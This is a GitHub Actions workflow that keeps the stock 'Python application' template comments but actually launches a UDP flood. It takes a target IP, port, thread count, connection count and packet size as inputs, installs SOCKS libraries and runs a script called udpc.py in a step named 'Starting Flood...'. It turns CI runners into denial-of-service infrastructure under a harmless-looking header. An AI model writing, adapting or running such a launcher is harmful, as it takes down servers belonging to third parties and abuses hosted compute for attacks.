# This workflow will install Python dependencies, run tests and lint with a single version of Python
# For more information see: https://help.github.com/actions/language-and-framework-guides/using-python-with-github-actions

name: Python application

on:
  workflow_dispatch:
    inputs:
      iptgt:
        description: "IP Target"
        required: true
      portgt:
        description: "Port Target"
        required: true
        default: "17091"
      thread:
        description: "Threads"
        required: true
        default: "6000"
      conn:
        description: "Multi-Connection"
        required: true
        default: "1000000"
      ps:
        description: "Packet Size"
        required: true
        default: "9048"
      

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v2
    - name: Set up Python 3.9
      uses: actions/setup-python@v2
      with:
        python-version: 3.9
    - name: Install dependencies
      run: |
        python -m pip install --upgrade pip
        pip install socks pysocks
        if [ -f requirements.txt ]; then pip install -r requirements.txt; fi
    - name: Starting Flood...
      run: |
        python udpc.py ${{ github.event.inputs.iptgt }} ${{ github.event.inputs.portgt }} ${{ github.event.inputs.thread }} ${{ github.event.inputs.conn }} ${{ github.event.inputs.ps }}
